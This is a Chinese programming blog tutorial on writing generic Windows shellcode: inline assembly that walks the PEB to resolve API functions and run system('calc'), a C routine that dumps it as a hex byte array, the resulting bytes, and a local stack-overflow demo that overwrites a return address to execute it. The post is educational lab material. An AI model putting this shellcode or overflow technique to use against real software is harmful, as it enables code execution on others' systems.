通用shellcode的编写、调用 实验缓冲区溢出攻击(非远程)调用shellcode实例(二)

最新推荐文章于 2024-12-19 20:26:28 发布
原创 最新推荐文章于 2024-12-19 20:26:28 发布 · 1.1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#visual studio 2010 #windows 8 #shellcode #缓冲区溢出攻击 #c语言

本文详细介绍了如何在Windows 8.1环境下,使用Visual Studio 2010进行缓冲区溢出攻击实验,以调用自编写的Shellcode。首先讲解了Shellcode的基本原理,然后提供了Shellcode的十六进制代码,并将其存储为全局变量。最后,文章展示了如何修改main函数以实现Shellcode的直接调用,但未涉及通过缓冲区溢出触发的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

上一章传送门:http://blog.youkuaiyun.com/u013582514/article/details/50094195

在上一章中讲述了用vs2010进行简单的缓冲区溢出攻击,这一章将讲述如何编写shellcode并用缓冲区溢出攻击调用shellcode



正文开始:

win8.1,vs2010

学过汇编的人一定了解,计算机会从内存中取得指令,而指令其实也都是一个个二进制数据,所以可以把代码(也就是指令)都转成十六进制数据放到数组里,之后运行它,这就是shellcode

直接上代码:

__asm
{
push ebp;
		mov esi, fs:0x30;            //PEB  
		mov esi, [esi + 0x0C];   //+0x00c Ldr              : Ptr32 _PEB_LDR_DATA  
		mov esi, [esi + 0x1C];  //+0x01c InInitializationOrderModuleList : _LIST_ENTRY  
	next_module:
		mov ebp, [esi + 0x08];
		mov edi, [esi + 0x20];
		mov esi, [esi];
		cmp[edi + 12 * 2], 0x00;
		jne next_module;
		mov edi, ebp; //BaseAddr of Kernel32.dll

		//寻找GetProcAddress地址  
		sub esp, 100;
		mov ebp, esp;
		mov eax, [edi + 3ch];//PE头  
		mov edx, [edi + eax + 78h]
			add edx, edi;
		mov ecx, [edx + 18h];//函数数量  
		mov ebx, [edx + 20h];
		add ebx, edi;
	search:
		dec ecx;
		mov esi, [ebx + ecx * 4];
		add esi, edi;
		mov eax, 0x50746547;
		cmp[esi], eax;
		jne search;
		mov eax, 0x41636f72;
		cmp[esi + 4], eax;
		jne search;
		mov ebx, [edx + 24h];
		add ebx, edi;
		mov cx, [ebx + ecx * 2];
		mov ebx, [edx + 1ch];
		add ebx, edi;
		mov eax, [ebx + ecx * 4];
		add eax, edi;
		mov[ebp + 76], eax;//eax为GetProcAddress地址  

		//获取LoadLibrary地址  
		push 0;
		push 0x41797261;
		push 0x7262694c;
		push 0x64616f4c;
		push esp
			push edi
			call[ebp + 76]
			mov[ebp + 80], eax;

		//获取ExitProcess地址  
		push 0;
		push 0x737365;
		push 0x636f7250;
		push 0x74697845;
		push esp;
		push edi;
		call[ebp + 76];
		mov[ebp + 84], eax;

		////////////////////////////////////////////我的代码开始  

		//获取Sleep地址  
		push 0x70;
		push 0x65656C53;
		push esp;
		push edi;
		call[ebp + 76];
		mov[ebp + 88], eax;

		//Sleep(10000)  
		//push 0xFFFFFFFF;
		//call[ebp + 88];


		///////////////////////////////////////////我的代码结束  

		//加载msvcrt.dll   LoadLibrary("msvcrt")  
		push 0;
		push 0x7472;
		push 0x6376736d;
		push esp;
		call[ebp + 80];
		mov edi, eax;

		//获取system地址  
		push 0;
		push 0x6d65;
		push 0x74737973;
		push esp;
		push edi;
		call[ebp + 76];
		mov[ebp + 92], eax;

		//system("calc")  
		push 0;
		push 0x636c6163;
		push esp;
		call[ebp + 92];

		//ExitProcess  
		call[ebp + 84];
}
这是一部分汇编代码,创建一个.c文件,放到main函数里就可以运行了。它的效果是打开系统计算机,适配于winxp到win8系统。

这部分代码是网上找的,如果看不懂的话,自己去多搜搜它的解释,这段代码还是挺火的。

接下来把它转成十六进制数据:

#include "windows.h"
#include <stdio.h>
#pragma comment(linker,"/SECTION:.data,RWE") 

void test()
{

	char buf[8];
	strcpy_s(buf, sizeof(shellcode), shellcode);
}

void test_shellcode()
{
	((void(*)())&shellcode)();
	/*__asm
	{
		lea eax, shellcode;
		jmp eax;
	}*/
}

unsigned char *asm_code()
{
	__asm
	{
		lea eax, __code
			jmp __ret
	}
	//这里放shellcode的汇编代码
	__asm
	{
	__code:
		push ebp;
		mov esi, fs:0x30;            //PEB  
		mov esi, [esi + 0x0C];   //+0x00c Ldr              : Ptr32 _PEB_LDR_DATA  
		mov esi, [esi + 0x1C];  //+0x01c InInitializationOrderModuleList : _LIST_ENTRY  
	next_module:
		mov ebp, [esi + 0x08];
		mov edi, [esi + 0x20];
		mov esi, [esi];
		cmp[edi + 12 * 2], 0x00;
		jne next_module;
		mov edi, ebp; //BaseAddr of Kernel32.dll

		//寻找GetProcAddress地址  
		sub esp, 100;
		mov ebp, esp;
		mov eax, [edi + 3ch];//PE头  
		mov edx, [edi + eax + 78h]
			add edx, edi;
		mov ecx, [edx + 18h];//函数数量  
		mov ebx, [edx + 20h];
		add ebx, edi;
	search:
		dec ecx;
		mov esi, [ebx + ecx * 4];
		add esi, edi;
		mov eax, 0x50746547;
		cmp[esi], eax;
		jne search;
		mov eax, 0x41636f72;
		cmp[esi + 4], eax;
		jne search;
		mov ebx, [edx + 24h];
		add ebx, edi;
		mov cx, [ebx + ecx * 2];
		mov ebx, [edx + 1ch];
		add ebx, edi;
		mov eax, [ebx + ecx * 4];
		add eax, edi;
		mov[ebp + 76], eax;//eax为GetProcAddress地址  

		//获取LoadLibrary地址  
		push 0;
		push 0x41797261;
		push 0x7262694c;
		push 0x64616f4c;
		push esp
			push edi
			call[ebp + 76]
			mov[ebp + 80], eax;

		//获取ExitProcess地址  
		push 0;
		push 0x737365;
		push 0x636f7250;
		push 0x74697845;
		push esp;
		push edi;
		call[ebp + 76];
		mov[ebp + 84], eax;

		////////////////////////////////////////////我的代码开始  

		//获取Sleep地址  
		push 0x70;
		push 0x65656C53;
		push esp;
		push edi;
		call[ebp + 76];
		mov[ebp + 88], eax;

		//Sleep(10000)  
		//push 0xFFFFFFFF;
		//call[ebp + 88];


		///////////////////////////////////////////我的代码结束  

		//加载msvcrt.dll   LoadLibrary("msvcrt")  
		push 0;
		push 0x7472;
		push 0x6376736d;
		push esp;
		call[ebp + 80];
		mov edi, eax;

		//获取system地址  
		push 0;
		push 0x6d65;
		push 0x74737973;
		push esp;
		push edi;
		call[ebp + 76];
		mov[ebp + 92], eax;

		//system("calc")  
		push 0;
		push 0x636c6163;
		push esp;
		call[ebp + 92];

		//ExitProcess  
		call[ebp + 84];
	}

	//函数结语
	__asm int 3
	__asm { __ret: }
}


int main()
{
	unsigned char temp;
	int i = 1;
	unsigned char *asm_p = asm_code();
	FILE *fd = fopen("code.txt", "w");
	fprintf(fd, "unsigned char shellcode[] = \"");
	while ((temp = *asm_p) != 0xcc)
	{
		fprintf(fd, "\\x%.2x", temp);
		asm_p++;
		if (i % 8 == 0) fprintf(fd, "\"\n\"");
		i++;
	}
	fprintf(fd, "\";");
	fclose(fd);
	/*__asm
	{
		lea eax, shellcode;
		jmp eax;
	}*/
	//((void(*)())&shellcode)();
	return 0;
}
直接运行,之后打开项目所在文件夹,会发现一个code.text文件,打开里面会有已经准备好的unsigned char shellcode[]的初始化

这是我转化后得到的shellcode代码

unsigned char shellcode[] = "\x55\x64\x8b\x35\x30\x00\x00\x00"
"\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e"
"\x08\x8b\x7e\x20\x8b\x36\x80\x7f"
"\x18\x00\x75\xf2\x8b\xfd\x83\xec"
"\x64\x8b\xec\x8b\x47\x3c\x8b\x54"
"\x07\x78\x03\xd7\x8b\x4a\x18\x8b"
"\x5a\x20\x03\xdf\x49\x8b\x34\x8b"
"\x03\xf7\xb8\x47\x65\x74\x50\x39"
"\x06\x75\xf1\xb8\x72\x6f\x63\x41"
"\x39\x46\x04\x75\xe7\x8b\x5a\x24"
"\x03\xdf\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x03\xdf\x8b\x04\x8b\x03\xc7"
"\x89\x45\x4c\x6a\x00\x68\x61\x72"
"\x79\x41\x68\x4c\x69\x62\x72\x68"
"\x4c\x6f\x61\x64\x54\x57\xff\x55"
"\x4c\x89\x45\x50\x6a\x00\x68\x65"
"\x73\x73\x00\x68\x50\x72\x6f\x63"
"\x68\x45\x78\x69\x74\x54\x57\xff"
"\x55\x4c\x89\x45\x54\x6a\x70\x68"
"\x53\x6c\x65\x65\x54\x57\xff\x55"
"\x4c\x89\x45\x58\x6a\x00\x68\x72"
"\x74\x00\x00\x68\x6d\x73\x76\x63"
"\x54\xff\x55\x50\x8b\xf8\x6a\x00"
"\x68\x65\x6d\x00\x00\x68\x73\x79"
"\x73\x74\x54\x57\xff\x55\x4c\x89"
"\x45\x5c\x6a\x00\x68\x63\x61\x6c"
"\x63\x54\xff\x55\x5c\xff\x55\x54"
"";


把它放到全局变量里,之后修改main函数代码为

__asm
{
<span style="white-space:pre">	</span>lea eax,shellcode;
<span style="white-space:pre">	</span>call shellcode;
}
这样就可以调用了,运行后会成功看到系统计算机被打开。



当然这是直接调用,并不是缓冲区溢出攻击得出来的效果,现在继续修改代码

void fun(char *str)
{
	char buffer[4];
	memcpy(buffer, str, 16);
}

int main()
{
	char badStr[] = "000011112222333344445555";
	DWORD *pEIP = (DWORD*)&badStr[8];
	*pEIP = (DWORD)&shellcode[0];//拿到字符数组的第一个元素并获取它的地址
	fun(badStr);

	return 0;
}
这样就可以成功获得效果了。



王梓舟
关注
缓冲区溢出及原理
一杯水果茶!足矣~
12-05 1376
缓冲区溢出就好比一个杯子倒太多的水,溢出来,这叫溢出
linux x86_64 缓冲区溢出分析 以及 shellcode简介
shuimuyq的专栏
01-15 1965
/* buger.c */ #include #include #include int main(void) { char buffer[128] = {0}; char *envp = NULL; printf("buffer address is: %p\n", &buffer); envp = getenv("KIRIKA"); if (envp) strcpy
详解缓冲区溢出-ShellCode提取等
08-22
这算是比较详细的讲解缓冲区溢出攻防等利用手段 从入门到精通 我相信看完后 哪怕对缓冲区溢出闻所未闻的人 也能成为一个高手 个中意识及生动的讲解方式 课后练习等~~ 相对这方面的知识网上还很少 而且入门级的就更少了 这里忍疼风险出来 需要的账户和密码已经打包在压缩文件中
编写并提取通用 ShellCode
weixin_30790841的博客
08-27 776
简易 ShellCode 虽然可以正常被执行,但是还存在很多的问题,因为上次所编写ShellCode 采用了硬编址的方式来调用相应API函数的,那么就会存在一个很大的缺陷,如果操作系统的版本不统一就会存在调用函数失败甚至是软件卡死的现象,下面我们通过编写一些定位程序,让 ShellCode 能够动态定位我们所需要的API函数地址,从而解决上节课中 ShellCode通用性问题。 ...
缓冲区溢出ShellCode实验
obestboy的专栏
04-28 1094
一、实验代码#include &lt;windows.h&gt; #include &lt;string.h&gt; #include &lt;stdio.h&gt; int fun(char *cpybuf) { char buf[8]; strcpy(buf,cpybuf); return 0; } int main() { MessageBox(NULL,"B...
逆向工程日记之缓冲区溢出的利用-ShellCode编写
wixinbibiu123的博客
10-04 972
缓冲区溢出的利用-ShellCode编写前言实验前提所需基础缓冲区溢出原理简单介绍概要ShellCode介绍实验开始get_jmp.exe的运行结果对text2.exe进行逆向分析。 前言 Hello,各位广大的网友们好。笔者为大在校大学生,软件学院。为践行费曼学习法,并在前辈的建议下开始写自己的一系列博客,之前用一篇文章大概的诠释了缓冲区溢出的基本原理,本文将以此为基础进行缓冲区溢出利用的研究...
缓冲区溢出】栈溢出原理 | 简单shellcode编写
VI___
02-02 5864
一、Buffer Overflow Vulnerability ESP:该指针永远指向系统栈最上面一个栈帧的栈顶 EBP:该指针永远指向系统栈最上面一个栈帧的底部 缓冲区溢出漏洞的原理就是因为输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符将返回地址覆盖掉了,当函数需要返回的时候,由于此时的返回地址是一个无效地址,因此导致程序出错。 那...
通用shellcode编写调用 实验缓冲区溢出攻击远程调用shellcode实例()
u013582514的专栏
11-29 4581
在阅读此篇文章时,请先确定已有一些计算机功底,其中包括计算机组成原理、寄存器功能、汇编语感。 正文开始: 实验环境:windows8.1,vs2010 相信不少人听说过缓冲区溢出攻击,这是当时黑客网络攻击很关键的一种攻击方式,直到现在很多黑客找到bug后进行的攻击行为还是基于它为原理,今天我给大家简单实验一下。 首先讲一下缓冲区溢出攻击如何实现,就要
缓冲区溢出入门网络安全缓冲区溢出原理与实践:C语言程序中栈溢出Shellcode基础入门教程
最新发布
07-15
文中通过具体示例展示了如何利用缓冲区溢出改变程序执行流程,如通过修改函数指针使未被调用的函数得以执行。此外,还讲解了shellcode的基础,即如何将机器码嵌入程序并执行,以及如何定位程序内存地址以实现精准...
深入解析与防范:基于缓冲区溢出的FTP服务器攻击调用计算器示例
Liu_Bruce的博客
12-19 1397
本文将详细探讨一种利用缓冲区溢出漏洞对FTP服务器进行远程攻击的技术,并通过分析给定代码示例,揭示其工作原理和潜在风险。我们将重点讨论如何在靶机上实现调用计算器(calc.exe)的过程,并介绍有效的防范措施以保障系统的安全性。给定的代码实现了一个针对特定目标(IP地址为)的FTP服务器的缓冲区溢出攻击。该攻击通过发送一个过长的用户名(USER命令),触发目标服务器中的缓冲区溢出漏洞,最终执行嵌入的shellcode调用计算器(calc.exe。
huanchongquyichu.rar_缓冲区溢出
09-21
"缓冲区溢出教程"文档可能是本领域的入门教材,涵盖基本概念、实例分析和防御策略。而"www.pudn.com.txt"可能包含更多相关的链接和讨论,对于深入学习和理解缓冲区溢出有帮助。 总结,了解缓冲区溢出的原理和防范...
linux下的缓冲区溢出攻击技术
06-14
Linux下的缓冲区溢出攻击技术研究,很好的说是论文,对研究缓冲区溢出攻击有很大的帮助。
linux下缓冲区溢出攻击源代码
10-14
经典缓冲区溢出攻击源代码,包含详细的分析文档,不可多得的资源,对于理解缓冲区溢出原理以及汇编语言有很好的帮助。《深入理解计算机系统》一书中使用到的例子,我将这个例子进行了详细的分析,并进行了实现。提供的包中包含我在设计过程中遇到的各种设计难题和技术难题。欢迎下载
shellcode,缓冲区溢出漏洞及 远程调call
任鸟飞2217777779的博客
02-13 1514
这个函数分配了8个字节的缓冲区,然后通过 strcpy 函数将传进来的字符串复制到缓冲区中,最后输出,如果传入的字符串大于 8的话就会发生溢出,并向后覆盖堆栈中的信息,如果只是一些乱码的话那个最多造成程序崩溃,如果传入的是一段精心设计的代码,那么计算机可能回去执行这段攻击代码。我们的shellcode 不能有00,否则 strcpy 会提前结束,所以 上面的代码中有字符串00结尾,需要我们修改成其他的代码形式。我们只要把返回地址覆盖成我们要执行的代码地址,就可以让该函数返回的时候去顺利执行我们的代码了.
缓冲区溢出漏洞I 栈溢出漏洞详解原理基础;shellcode
CHERRY_cong的博客
05-01 831
5-溢出漏洞I 文章目录5-溢出漏洞I一、栈布局程序的内存栈结构函数参数在栈中的顺序函数调用栈函数调用链的栈布局、易受攻击的代码缓冲区溢出的代价三、如何运行恶意代码环境准备 Environment Setup恶意输入的创建(badfile)Task A: Distance Between Buffer BaseTask B : Address of Malicious CodeThe Structure of badfileNew Address in Return Address四、Shellcode
linux 下缓冲区溢出攻击原理及示例
么刚的专栏
11-07 6667
linux 下缓冲区溢出攻击原理及示例
网络安全(超级详细)零基础带你一步一步走进缓冲区溢出漏洞和shellcode编写
2401_88756905的博客
12-02 812
在C语言里面的string标准库中,有这么一个著名的strcpy函数,这个strcpy函数的作用就是将字符串数组拷贝到指定的位置。当我们单步执行过之后,我们会发现,这个程序因为缓冲区被冲破,所以父函数EBP被覆盖了,也就是造成了缓冲区溢出。思路:我们需要寻找电脑中可利用的动态链接库中可以用的指令,这样的话,我们就可以执行我们想要的指令了。因为我们需要可视化的效果,所以我们挑选一个弹出一个对话框的方法来使我们可视化。在这里我们加长了payload的长度,大家可以看到,程序还是完美的运行了,。
linux缓冲区溢出漏洞软件,linux 下实现缓冲区溢出漏洞shellcode
weixin_30113867的博客
05-12 362
1. shellcode编写所谓的shellcode,就是通过一段机器代码,获取到shell命令行。shellcode可以通过多种方式获得,比如裸写16进制代码(一般很少有人这么干。。。),常见的还是写汇编代码,然后转换成机器代码。这里分享一个简单的shellcode生成过程,首先编写汇编代码,如下:;setreuid;char *shell[2];;shell[0] = "/bin/sh";sh...
浅析缓冲区溢出漏洞的利用与Shellcode编写
道阻且长,行则将至
09-30 8137
文章目录前言 前言 缓冲区是内存中存放数据的地方。在程序试图将数据放到及其内存中的某一个位置的时候,因为没有足够的空间就会发生缓冲区溢出缓冲区溢出就好比是将十升水放进只有五升容量的桶里。很显然,一旦容器满了,余下的部分就会溢出在地板上,弄得一团糟。缓冲区溢出漏洞是指在程序试图将数据放到及其内存中的某一个位置的时候,因为没有足够的空间就会发生缓冲区溢出的现象。 ...
Windows缓冲区溢出Shellcode存储位置探讨
"这篇文章主要探讨了ShellcodeWindows环境下的缓冲区溢出攻击技术,包括Shellcode的基本概念、编写及不同存储位置的利用方法。作者通过介绍三种不同的方法,展示了如何在内存中放置Shellcode并使其执行,以此来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值